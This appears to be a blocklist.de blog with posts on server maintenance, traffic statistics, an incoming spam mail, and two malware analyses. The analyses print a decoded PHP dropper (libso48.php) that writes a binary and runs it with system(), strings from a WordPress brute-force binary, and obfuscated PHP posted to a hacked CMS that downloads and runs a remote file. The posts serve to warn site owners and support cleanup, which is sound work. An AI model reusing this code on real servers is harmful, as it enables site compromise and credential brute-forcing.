We hope our service makes the Internet better, safer and helps to clean the infected PCs.
Der Blog von www.blocklist.de wird hauptsächlich zum archivieren von Statistiken verwendet.
Wenn es mal was interessantes gibt, wird dies hier veröffentlicht. Dazu gehört z.B. neue Angriffe oder Wellen von neue Muster oder wenn eine Art von Angriffen einem Bot-Netz oder einem Wurm zugeordnet werden konnte.
In the last Days, we had some mysql-Server issues.
The Server crashs and could only hard restarted.
We do yesterday a lot of analyze the Logfiles and optimize Settings.
We monitored the Server tonight with Debug Options, and it looks at the moment good.
We looking far on it, that he runs stable like before again.
Some Queries are now a little bit slower, but we work next on it again to optimize it.
Sorry for the Problems.
In the last years/month, it was very quite around blocklist.de
In the last time, we had changed a lot behind the System and drop a lot of Reports/Attacks, which are older then the current two Weeks.
Old stuff is already droped, but not good enough, so we got so much often Problems with the mysql-Server.
At the moment, it looks strange, because the Attacks are droping down from ~24k to 7k, but when we dont make a bug in, it will recover in the next days.
And so, yes blocklist.de is still alive 🙂
But it is a lot of work and i dont have enough time, so it is going slowly.
In den letzten Tagen, kam es leider zu Bounce-Mails an die Fail2Ban Absender-Adresse mit einer Meldung wie:
<fail2ban@blocklist.de>: Command died with status 255
Dies ist nun gefixt.
Ebenso ist noch ein anderer Bug offen, wo ich noch dran bin.
Auch bei den Statistiken, aber das ist leider aufgrund der hohen Menge nicht gut zu skalieren und dort stoße ich immer wieder auf Probleme.
Und ja, das Projekt lebt noch und wird bald auch in Virustotal mit aufgenommen 🙂
Auch in der letzten Zeit, ist der Intervall, wann die Support-Mails abgearbeitet werden, etwas größer geworden, da bin ich schon dran. Alle Mails, welche aber zu alt sind, werden als „resolved“ markiert und somit ein Schnitt gemacht.
A half year ago, since the first News comes up, that the Updates for the Debian-LTS from Update is near EndOfLife, we have tried to upgrade the blocklist.de-Systems.
But it was to hard 🙁
Because there was a lot of Changes, which need to manually fixed.
We have copied the Data to a vps and worked with them. So we update the System -> crash… Rockbackup, fixed the Error, Update -> crash…. and again and again…….
After round about 6 Months later, we had fixed all Errors and run now all Systems with the latest Version of the OS.
After the first stable Updates, there was a some Bugs, we dont see, but the BlockList.de-User has informed and helped us, to fix this.
So, now the Blocklist.de-Site is almost as soon as the previous System (with a little bit more Caching).
Only the Munin-Pictures are broken at the moment, because there was too many Users for the Munin-System. But we work on it and for the most Graphs, the creating works again fine.
The Website has an A+-Raking at ssllabs now:
https://www.ssllabs.com/ssltest/analyze.html?d=blocklist.de&s=185.21.103.31
https://de.ssl-tools.net/webservers/www.blocklist.de
And also the Mailsystem:
| MX Server | Pref | Con- nect |
All- owed |
Can Use |
TLS Adv |
Cert OK |
TLS Neg |
Sndr OK |
Rcvr OK |
| smtp-mx.blocklist.de [93.180.154.80] |
10 | OK (134ms) |
OK (135ms) |
OK (136ms) |
OK (137ms) |
OK (442ms) |
OK (136ms) |
OK (136ms) |
FAIL * |
| smtp-mx2.blocklist.de [46.252.26.16] |
20 | OK (181ms) |
OK (182ms) |
OK (180ms) |
OK (180ms) |
OK (467ms) |
OK (183ms) |
OK (187ms) |
FAIL * |
| webserver3.blocklist.de [185.21.103.31] |
70 | OK (140ms) |
OK (8,253ms) |
OK (131ms) |
OK (131ms) |
OK (443ms) |
OK (132ms) |
OK (141ms) |
FAIL * |
| smtp-mx.blocklist.de [93.180.154.80] |
80 | OK (137ms) |
OK (136ms) |
OK (133ms) |
OK (133ms) |
OK (373ms) |
OK (134ms) |
OK (136ms) |
OK (251ms) |
* = greylisting for the tested Address is active.
https://de.ssl-tools.net/mailservers/smtp-mx.blocklist.de
What we have already build:
The next Step are:
In the last Days, we see a lot of hacked WordPress/Joomla-Sites, which makes outgoing BruteForce-Login Attacks to other WordPress-Sites.
The Attackers create some Files with the name libso48.php, libso47.php, libso46.php and call them over GET-Requests with Parameter id:
domain.tld/directory/xxx/xxx/libso48.php?id=ksej4kWxddukqL2iTZeD&a=MwUvLBQjEzhYUx4IJnc/WyQC
The using UserAgent is with the String „–user-agent“:
" --user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
The bad files check if the Server runs at x32 or x64 and compile a file libworker.so
The libworker.so File makes the attacks.
Code from the libso48.php (decoded):
<?php
header("Content-type: text/plain");
if (!function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (!$f) return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
//@system("killall -9 ".basename("libworker.so"));
$so32 = Hex-Code;$so64 = Hex-Code;//hexcode decoded start ............
fork
INFO Started brute forcing.
path=/wp-content/pluginsINFO SUCCESS: %s
<!DOCTYPE html<ERROR> (%s:%d: errno: %s)
can not determine logged in or not.
INFO exit status: %d
........
<ERROR> (%s:%d: errno: %s)
Error.
<INFO> (%s:%d: errno: %s)
Started xml rpc brute force
.........
//hexcode decoded end
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."
";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."
";
fclose($f);
}
print "SO dumped ".file_put_contents("./libworker", $so)."
";
@chmod("libworker", 0777);
//@system("./libworker " . $_GET['id'] . " > /dev/null 2> /dev/null &");
@system("./libworker " . $_GET['id'] . " " . $_GET['a'] . " > out 2> err &");
exit(0);
?>The complete Script is decoded under unphp.net (but with the decoded hex code):
http://www.unphp.net/decode/9f6f7e9085045418857e6b54e07b20e9/
On the Hexcode, which was written in the libworker.so file had the following code inside:
......
%s
}{
"type" : "WPBF_RESPONSE",
"success" : false,
"site" : "%s",
"user" : "%s"
}
Sending: %s
{
"type" : "WPBF_RESPONSE",
"success" : true,
"site" : "%s",
"user" : "%s",
"pass" : "%s"
}
{}curlhttp://https://%swp-login.php%s/wp-login.phphttp://%swp-login.phphttp://%s/wp-login.phplog=%s&pwd=%s&wp-submit=Log+In&redirect_to=http%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1log=%s&pwd=%s&wp-submit=Log+In&redirect_to=https%%3A%%2F%%2F%s%%2Fwp-admin%%2F&testcookie=1--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0--dataCookie:wordpress_test_cookie=WP+Cookie+check-HContent-Type:application/x-www-form-urlencodedCache-Control:max-age=0Accept-Language:en-US;Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8-A-iINFO checking: %s, %s, %s
Success./src/wpbf/bf.c<ERROR> (%s:%d: errno: %s)
You can see always, the Attacker use curl and Makes xmlrpc-BruteForce and normal wp-login.php WordPressBruteForce-Logins.
If you found the libso48.php or libworker.so File in your Webspace, please check, clean and update your software and stop running processes from libworker file.
The Traffic, Load, Users and other Statistics of blocklist.de for the Month 02.2015
Currently, blocklist.de has the following Stats/User:
User: 2,144
Server: 2,325
Attacks: 246,084,421 since 01.01.2014
Reports: 10,092,816 since 2012
Daily Mails: ~690,500 (lower limit) ~1,450,000 (high limit)
Web-Traffic: ~309 GB
RBL-/API-Traffic: ~85 GB
Mail (In/Out)-Traffic: ~~3,528 GB
Traffic over IPv6 (Mail, Web..): ~5GB
To this data, there comes 6,4TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,5 GB each Hour out.
The Mysql-Server use now 62% from 32GB Ram (~14gb Cache). And the System-Load is in average on 1.10 .
The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~25,000 on the same time
The complete Traffic from all Systems are round about 6,6TB in 02/2015 (the Traffic from MySQL-Server over the not public IPs is not included).
The Traffic, Load, Users and other Statistics of blocklist.de for the Month 09.2014
Currently, blocklist.de has the following Stats/User:
User: 1,719
Server: 1,932
Attacks: 282,138,414 since 05.05.2013
Reports: 8,572,275 since 2012
Daily Mails: ~750,400 (lower limit) ~1,250,000 (high limit)
Web-Traffic: ~290 GB
RBL-/API-Traffic: ~80 GB
Mail (In/Out)-Traffic: ~~3,315 GB
Traffic over IPv6 (Mail, Web..): ~5GB
To this data, there comes 6,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~8,4 GB each Hour out.
The Mysql-Server use now 60% from 32GB Ram (~14gb Cache). And the System-Load is in average on 2.40 .
The WebServer is using not full of 12GB Ram and the System-Load is under 0,6. The open Connections are ~23,000 on the same time
The complete Traffic from all Systems are round about 6,4TB in 09/2014 (the Traffic from MySQL-Server over the not public IPs is not included).
After 2 Years, we try to regenerate the Statistics over the countries from month to month again.
The Image (Up, down, same….) is the different from 2012 (last statistics):
Die Pfeile ist die Position zum Vormonat (gestiegen, gefallen, gleich geblieben).
Nach IP-Adressen sortiert (unique):
Sortiert nach Anzahl der Angriffe:
I have some sites with outdated Software for a other Project.
Normally, the Site was secured with a .htaccess File. All Sites was secured by Quotas and other Tools and also monitored (sha1-filehash Checker, Processlist Checker…).
Two sites was now hacked, because the .htaccess was temporarily disabled and forgotten to reactivated.
Then there comes the following Requests to a outdated ModEvelution-Software:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx
"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
The Post Variables was:
POST['n132a88'] = "ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7";
decoded it is only:
echo „qq11oadnq98cjnwejioln23++“;
A other Request was:
62.76.187.163 - - [04/Aug/2014:08:34:13 +0200] "POST http://www.dev.domain.tld/manager/includes/lang/country/italian_country.inc.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
A other Request was:
85.143.166.103 - - [07/Aug/2014:02:53:59 +0200] "POST http://ZWNobyAicXExMW9hZG5xOThjam53ZWppb2xuMjMrKyI7/assets/cache/docid_685.pageCache.php HTTP/1.1" 200 xxx "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
POST[„n0b8385“] = „JHMzOD0iV25cXGlhKm9tPX1ZVUJqd1EmZy1TTE1xXi90OlB+XHRkVFpdJzgoeGtARFwkMyMxXG4uNl9OaFIrWzl5cztDfGwhYiU1SWY0MkhPcEp1MEc8KVZgRlxye1gsRT5LXCJlY3pyIDdBdj8iOyAkR0xPQkFMU1sneHRrenA5NCddID0gJHMzOFs3MV0uJHMzOFs1MF0uJHMzOFs3MV0uJHMzOFs0OF0uJHMzOFs3M10uJHMzOFsxXS4kczM4WzRdLiRzMzhbN10uJHMzOFs4OV07ICRHTE9CQUxTWydmamlpYjUxJ10gPSAkczM4WzY2XS4kczM4WzczXS4kczM4WzFdLiRzMzhbOTBdLiRzMzhbMjVdLiRzMzhbM10uJHMzOFs2X
….
……
….
bGNyNTgnXSgkczM4LCAkczM4WzQ2XS4kczM4WzI0XS4kbnF3cnMwLCAkcHBvcWI0NykgPT0gRkFMU0UpIHsJCWlmICgkR0xPQkFMU1snandsY3I1OCddKCRzMzgsICRzMzhbMjRdLiRzMzhbMjVdLiRzMzhbN10uJHMzOFs3MV0uJHMzOFsyNF0uJG5xd3JzMCwgJHBwb3FiNDcpID09IEZBTFNFKSB7CQkJcmV0dXJuIEZBTFNFOwkJfSBlbHNlIHsJCQlyZXR1cm4gJHMzOFsyNF0uJHMzOFsyNV0uJHMzOFs3XS4kczM4WzcxXS4kczM4WzI0XS4kbnF3cnMwOwkJfQl9IGVsc2UgewkJcmV0dXJuICRzMzhbNDZdLiRzMzhbMjRdLiRucXdyczA7CX0JcmV0dXJuIEZBTFNFO30=“;
Decoded the sending Post Variable was:
$s38="Wn\\ia*om=}YUBjwQ&g-SLMq^/t:P~\tdTZ]'8(xk@D\$3#1\n.6_NhR+[9ys;C|l!b%5If42HOpJu0G< )V`F\r{X,E>K\"eczr 7Av?";
$GLOBALS['xtkzp94'] = $s38[71].$s38[50].$s38[71].$s38[48].$s38[73].$s38[1].$s38[4].$s38[7].$s38[89];
$GLOBALS['fjiib51'] = $s38[66].$s38[73].$s38[1].$s38[90].$s38[25].$s38[3].$s38[6].$s38[1].$s38[48].$s38[89].$s38[37].$s38[3].$s38[56].$s38[25].$s38[56];
$GLOBALS['aojaf86'] = $s38[56].$s38[25].$s38[92].$s38[60].$s38[89].$s38[1];
… Truncat against Kaspersky says it is an Virus…. aaaaaahhhhhhhh
=$s38[50].$s38[25].$s38[25].$s38[71].$s38[26].$s38[24].$s38[24].$s38[1].$s38[6].$s38[25].$s38[89].$s38[56].$s38[46].$s38[4].$s38[92].$s38[25].$s38[18].$s38[71].$s38[4].$s38[92].$s38[25].$s38[1].$s38[89].$s38[92].$s38[46].$s38[1].$s38[89].$s38[25].$s38[24].$s38[56].$s38[7].$s38[47].$s38[67];
$zxozz28 = $s38[83].$s38[40].$s38[78].$s38[19].$s38[49].$s38[48].$s38[19].$s38[85].$s38[19].$s38[19].$s38[65].$s38[70].$s38[49].$s38[48].$s38[58].$s38[70].$s38[70].$s38[87].$s38[65].$s38[85].$s38[8].$s38[27].$s38[1].$s38[72].$s38[37].$s38[27].$s38[40].$s38[21].$s38[55].$s38[27].$s38[3].$s38[44].$s38[55].$s38[90].$s38[31].$s38[14].$s38[52].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[75].$s38[37].$s38[73].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[13].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[22].$s38[27].$s38[40].$s38[64].$s38[42].$s38[90].$s38[69].$s38[65].$s38[35].$s38[70].$s38[13].$s38[65].$s38[91].$s38[49].$s38[31].$s38[67].$s38[25].$s38[30].$s38[42].$s38[12].$s38[55].$s38[27].$s38[40].$s38[64].$s38[73].$s38[30].$s38[13].$s38[14].$s38[42].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[68].$s38[27].$s38[40].$s38[64].$s38[73].$s38[10].$s38[31].$s38[14].$s38[91].$s38[21].$s38[13].$s38[65].$s38[52].$s38[20].$s38[0].$s38[64].$s38[50].$s38[27].$s38[40].$s38[64].$s38[17].$s38[90].$s38[31].$s38[14].$s38[14].$s38[21].$s38[13].$s38[67].$s38[25].$s38[10].$s38[69].$s38[85].$s38[35].$s38[27].$s38[7].$s38[64].$s38[42].$s38[27].$s38[75].$s38[71].$s38[68].$s38[30].$s38[1].$s38[65].$s38[67].$s38[20].$s38[19].$s38[44].$s38[13].$s38[10].$s38[0].$s38[80].$s38[37].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[74].$s38[52].$s38[20].$s38[0].$s38[64].$s38[42].$s38[27].$s38[40].$s38[64].$s38[17].$s38[30].$s38[91].$s38[37].$s38[22].$s38[30].$s38[1].$s38[32].$s38[55].$s38[70].$s38[58].$s38[74].$s38[25].$s38[10].$s38[75].$s38[49].$s38[68].$s38[20].$s38[75].$s38[49].$s38[14].$s38[30].$s38[3].$s38[54].$s38[55].$s38[10].$s38[42].$s38[12].$s38[68].$s38[62].$s38[75].$s38[30].$s38[14].$s38[20].$s38[75].$s38[37].$s38[1].$s38[30].$s38[3].$s38[44].$s38[13].$s38[10].$s38[91].$s38[95].$s38[56].$s38[90].$s38[7].$s38[71].$s38[55].$s38[27].$s38[3].$s38[44].$s38[17].$s38[30].$s38[91].$s38[14].$s38[52].$s38[90].$s38[83].$s38[90].$s38[35].$s38[4].$s38[1].$s38[32].$s38[68].$s38[90].$s38[13].$s38[17].$s38[25].$s38[20].$s38[83].$s38[80].$s38[68].$s38[10].$s38[42].$s38[32].$s38[37].$s38[20].$s38[69].$s38[49].$s38[42].$s38[32].$s38[42].$s38[12].$s38[94].$s38[20].$s38[42].$s38[72].$s38[13].$s38[90].$s38[69].$s38[10].$s38[56].$s38[10].$s38[0].$s38[44].$s38[96].$s38[20].$s38[0].$s38[78].$s38[6].$s38[49].$s38[19].$s38[37].$s38[55].$s38[4].$s38[1].$s38[65].$s38[52].$s38[20].$s38[83].$s38[80].$s38[42].$s38[27].$s38[40].$s38[64].$s38[73].$s38[32].$s38[7].$s38[95].$s38[35].$s38[4].$s38[69].$s38[6].$s38[55].$s38[21].$s38[13].$s38[95].$s38[52].$s38[20].$s38[0].$s38[64].$s38[7].$s38[10].$s38[40].$s38[14].$s38[8];
$ntgai94 = $GLOBALS['xtkzp94']($s38[56]);
$igekj52 = $GLOBALS['xtkzp94']($s38[7]);
echo $s38[76].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
for (;;)
{
if (!$GLOBALS['fjiib51']($s38[56].$s38[50].$s38[89].$s38[60].$s38[60].$s38[48].$s38[89].$s38[37].$s38[89].$s38[90]))
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[44].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[56].$s38[50].$s38[89].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[86];
break;
}
if ($ntgai94 !== $s38[20].$s38[3].$s38[1].$s38[73].$s38[37])
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[68].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[1].$s38[6].$s38[60].$s38[3].$s38[1].$s38[73].$s38[37].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$mqcjh70.$s38[86];
break;
}
$nneyn30 = $s38[71].$s38[56];
$cttgs64 = "";
if ($GLOBALS['aojaf86']($GLOBALS['dfyoo42'](~0)) == 64)
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[47].$s38[67].$s38[86];
$cttgs64 = $rmznz0;
}
else
{
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[42].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[37].$s38[42].$s38[68].$s38[86];
$cttgs64 = $dfdjy19;
}
$pjimj72 = "";
if (!$GLOBALS['gwigy41']($nneyn30))
{
$pjimj72 = $GLOBALS['vziql67']($s38, $cttgs64, $nneyn30);
if ( $pjimj72 == FALSE)
{
echo $s38[76].$s38[89].$s38[92].$s38[92].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[67].$s38[93].$s38[89].$s38[92].$s38[92].$s38[8].$s38[30].$s38[6].$s38[14].$s38[1].$s38[60].$s38[93].$s3... Truncat against Kaspersky says it is an Virus.... aaaaaahhhhhhhh
echo $s38[76].$s38[3].$s38[1].$s38[66].$s38[93].$s38[56].$s38[25].$s38[89].$s38[71].$s38[8].$s38[64].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[8].$s38[30].$s38[6].$s38[1].$s38[89].$s38[93].$s38[30].$s38[4].$s38[25].$s38[4].$s38[68].$s38[8].$cgthg36.$s38[86];
$GLOBALS['tkjre65'](1);
$GLOBALS['jtjiv94']($pjimj72);
break;
}
echo $s38[76].$s38[24].$s38[56].$s38[50].$s38[90].$s38[50].$s38[91].$s38[91].$s38[91].$s38[86];
function fildv12($s38, $htxbt38)
{
$ppoqb47 = „“;
$ogrpt28 = @$GLOBALS[‚fjcva91‘]($htxbt38, $s38[92].$s38[62]);
if ($ogrpt28 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[90].$s38[73].$s38[92].$s38[60].$s38[48].$s38[3].$s38[1].$s38[3].$s38[25]))
return FALSE;
$henof76 = @$GLOBALS[‚dmrqg14′]();
@$GLOBALS[’npbou10′]($henof76, CURLOPT_URL, $htxbt38);
@$GLOBALS[’npbou10‘]($henof76, CURLOPT_RETURNTRANSFER, true);
$ppoqb47 = @$GLOBALS[‚hjiar61‘]($henof76);
@$GLOBALS[‚ekyyn43‘]($henof76);
}
else
{
while(!$GLOBALS[‚mashg65‘]($ogrpt28))
$ppoqb47.=$GLOBALS[‚udsvx59′]($ogrpt28, 1024 * 64 );
$GLOBALS[’naftp70‘]($ogrpt28);
}
return $ppoqb47;
}
function eghou87($s38, $yaxje72, $ppoqb47)
{
$negtx78 = $GLOBALS[‚fjcva91‘]($yaxje72, $s38[14].$s38[62].$s38[52]);
if ($negtx78 == FALSE)
{
if (!$GLOBALS[‚fjiib51‘]($s38[66].$s38[3].$s38[60].$s38[89].$s38[48].$s38[71].$s38[73].$s38[25].$s38[48].$s38[90].$s38[6].$s38[1].$s38[25].$s38[89].$s38[1].$s38[25].$s38[56]))
return FALSE;
if ( @$GLOBALS[‚wtxbv81‘]($yaxje72, $ppoqb47) === FALSE )
return FALSE;
}
else
{
$jznmi77 = $GLOBALS[‚acklf72‘]($negtx78, $ppoqb47, $GLOBALS[‚aojaf86′]($ppoqb47));
$GLOBALS[’naftp70‘]($negtx78);
if ($jznmi77 == FALSE || $jznmi77 != $GLOBALS[‚aojaf86‘]($ppoqb47))
return FALSE;
}
return TRUE;
}
function gbzrm90($s38, $htxbt38, $nqwrs0)
{
$ppoqb47 = $GLOBALS[‚adwwg63‘]($s38, $htxbt38);
if ($ppoqb47 == FALSE)
return FALSE;
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[46].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
if ($GLOBALS[‚jwlcr58‘]($s38, $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0, $ppoqb47) == FALSE)
{
return FALSE;
}
else
{
return $s38[24].$s38[25].$s38[7].$s38[71].$s38[24].$nqwrs0;
}
}
else
{
return $s38[46].$s38[24].$nqwrs0;
}
return FALSE;
}
A short lock shows, that the Code check with php_uname the System and downloads a xxxx64/xxxx32 File which was analysed from our Friends from MalwareMastDie under:
http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
For more Informations and Updates, you can follow MalwareMustDie on Twitter:
https://twitter.com/MalwareMustDie
So, please update and secure all your sites and scripts!
If you have Questions, please contact us 🙂
Today, we received a lot of Spammails like:
Presente para voce, consumidor: ate 60% off em pecas selecionadas Você Merece o Melhor Atencao, anapaula@pacaluz.com.br Casas Bahia Informa como aprovado seu pedido n. 18977 Este vendedor ainda trabalha com você? and other to our Postmaster-Address. Today it was over 1650 Mails. We have report them over spamcop.net to the Abuse-Departments of the Source and the Abuse-Department from the Links in the Body of mails. The most Spammails has in the Message-ID only @localhost.localdomain and used in the return-path Addresses like "bounce-xxx", "return-xxx" and other:
Return-Path: <return@baratomail4.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
id 80DDE2F1B70; Thu, 20 Mar 2014 06:53:39 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 80DDE2F1B70
Authentication-Results: mail.blocklist.de; dkim=permerror
(verification error: empty key record; insecure key)
header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
server5.customer-config.de
X-Spam-Level: ****
X-Spam-ASN:
X-Spam-Status: No, hits=4.4 required=5.5 tests=BAYES_00=-6.1,
DATE_IN_PAST_06_12=1.543,HTML_IMAGE_RATIO_02=0.437,HTML_MESSAGE=0.001,
MIME_HTML_ONLY=0.723,RCVD_IN_SBL=0.7,RDNS_NONE=0.793,URIBL_BLACK=1.725,
URIBL_DBL_SPAM=1.7,URIBL_JP_SURBL=1.25,URIBL_WS_SURBL=1.608 bayes=0.0000
relaysuntrusted=[ ip=2a01:4f8:150:74e2::4 rdns= helo=webserver2.blocklist.de
by=mail.blocklist.de ident= envfrom= intl=0 id=3EED02F1A6A auth= msa=0 ] [
ip=200.216.198.85 rdns=mx.grupotreviso.com.br helo=grupotreviso.com.br
by=webserver2.blocklist.de ident= envfrom= intl=0 id=422901E400A0 auth= msa=0
] [ ip=187.85.79.35 rdns= helo=rdns-6.baratomail4.com.br by=QA-Mail ident=
envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
2014 06:53:39 +0100] version=3.3.1
Received: from webserver2.blocklist.de (unknown [IPv6:2a01:4f8:150:74e2::4])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by mail.blocklist.de (Postfix) with ESMTPS id 3EED02F1A6A
for <root@blocklist.de>; Thu, 20 Mar 2014 06:53:27 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 3EED02F1A6A
Received: by webserver2.blocklist.de (Postfix, from userid 1000)
id E13FF1E400A0; Thu, 20 Mar 2014 06:53:26 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de E13FF1E400A0
Authentication-Results: webserver2.blocklist.de; dkim=permerror
(verification error: empty key record; insecure key)
header.i=abuse@baratomail4.com.br; dkim-adsp=none (insecure policy)
Received-SPF: none (baratomail4.com.br: No applicable sender policy available) receiver=webserver2.blocklist.de; identity=mailfrom; envelope-from="return@baratomail4.com.br"; helo=grupotreviso.com.br; client-ip=200.216.198.85
X-DKIM: OpenDKIM Filter v2.0.1 webserver2.blocklist.de 422901E400A0
Received: from grupotreviso.com.br (mx.grupotreviso.com.br [200.216.198.85])
by webserver2.blocklist.de (Postfix) with SMTP id 422901E400A0
for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:24 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: d599ce04b77699878cd55c7db6dd10258f298098e6d9af032a8ba934ebd2cb5f
X-QamailSafe-Source-Addr: 187.85.79.35
Received: from 187.85.79.35 (EHLO rdns-6.baratomail4.com.br)
by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:38:26 -0300
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=default; d=baratomail4.com.br;
h=To:Subject:Message-ID:Date:From:Reply-To:MIME-Version:List-Unsubscribe:Content-Type:Content-Transfer-Encoding; i=abuse@baratomail4.com.br;
bh=PL8mxp19/Mo2fJ7ycxAwI4XUbVc=;
b=iU0HK1hDwSOSnC92NnJXgqAoNV/7UQtZMD0lsY8w5otEjd/s6cijPH7e8yy/EsviWMz6g/ligLCs
cZIQFgUOOHJ50JmqbUq9Uc3VImqdlqF2iBnz6/LHa4e6h90ZX++YwDsxkA6d8ZaX1kaZxeS9cnb3
tdhFtYxY5JrUk/BDG0E=
To: vas.sl@grupotreviso.com.br
Subject: =?UTF-8?B?Vm9jw6ogTWVyZWNlIG8gTWVsaG9y?=
Message-ID: <b3164728023c9761cb7ff3db18d1a3be@baratomail4.com.br>
Date: Wed, 19 Mar 2014 15:17:21 -0300
From: "Sabor e Estilo" <send@baratomail4.com.br>
Reply-To: send@baratomail4.com.br
MIME-Version: 1.0
X-Mailer-LID: 8,6,5
List-Unsubscribe: <http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22>
X-Mailer-RecptId: 1289652
X-Mailer-SID: 22
X-Mailer-Sent-By: 1
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: 8bit
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>O Melhor Vinho do mundo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width" />
<style type="text/css">
@media only screen and (max-width:480px){
body {
margin: 0 auto !important;
padding: 0 auto !important;
}
table[class=omvm] { width: 300px !important; background-color:#FFFFFF
!important;}
table[class=omvm] td{ width: 300px !important; float:left !important;}
br[class=delete] {display:none !important;}
td[class=delete] {display:none !important;}
td[class=logo-omvm] img{ width: 300px !important; height: 98px !important;
float:left !important;}
td[class=accroche-omvm] img{ width: 300px !important; height: 111px
!important; float:left !important;}
td[class=visuel-omvm] img{ display:none !important;}
td[class=visuel-omvm] { width: 300px !important; height: 122px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/visuel-m.jpg")!important;
background-size: 300px 122px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=visuel-omvm] a{ width: 300px !important; height: 122px !important;
display:block !important;}
td[class=texte-omvm] { width: 300px !important; height: 150px !important;
float:left !important; padding-top:15px !important; text-align:center
!important;}
td[class=btn-omvm] img{ display:none !important;}
td[class=btn-omvm] { width: 300px !important; height: 80px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn-m.jpg")!important;
background-size: 300px 80px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=btn-omvm] a{ width: 300px !important; height: 80px !important;
display:block !important;}
td[class=mentions-omvm] { width: 300px !important; height: 20px !important;
